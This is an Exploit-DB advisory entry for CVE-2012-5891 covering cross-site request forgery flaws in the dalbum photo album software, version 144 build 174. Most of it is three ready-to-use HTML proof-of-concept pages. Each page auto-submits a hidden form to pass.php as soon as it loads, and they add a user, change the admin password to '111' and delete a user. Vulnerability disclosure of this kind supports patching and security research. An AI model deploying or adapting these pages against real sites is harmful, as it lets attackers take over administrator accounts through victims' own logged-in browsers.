dalbum 144 build 174 - Cross-Site Request Forgery

EDB-ID:

18685

CVE:

2012-5891

EDB Verified:

Author:

Ahmed Elhady Mohamed

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-03-30

Vulnerable App: 
dalbum 144 build 174 and earlier CSRF Vulnerabilities
===================================================================================
# Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities
# Vendor: http://www.dalbum.org/
# Download link :http://www.dalbum.org/index.php?go=Downloads
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 144 build 174
# Category: webapps
# Tested on: ubuntu 11.4 
# This vulnerability allows a malicious hacker to add a user 
  delete a user and change password of a user 
===================================================================================
CSRF VUlnerabilities :

POC 1:

	<html>
	<head>
	<title>  Add a user </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
		<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="CSRF" type="hidden" />
		<input name="pass" value="123" type="hidden" />
		<input name="passc" value="123" type="hidden" />
		<input type="hidden" name="action" value="add">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 2:

	<html>
	<head>
	<title>  Change user's password  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="admin" type="hidden" />
		<input name="pass" value="111" type="hidden" />
		<input name="passc" value="111" type="hidden" />
		<input name="change" value="Change password" type="hidden" />
		<input type="hidden" name="action" value="change">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 3:

	<html>
	<head>
	<title>  Delete a user  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="a" type="hidden" />
		<input type="hidden" name="delete" value="Delete">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services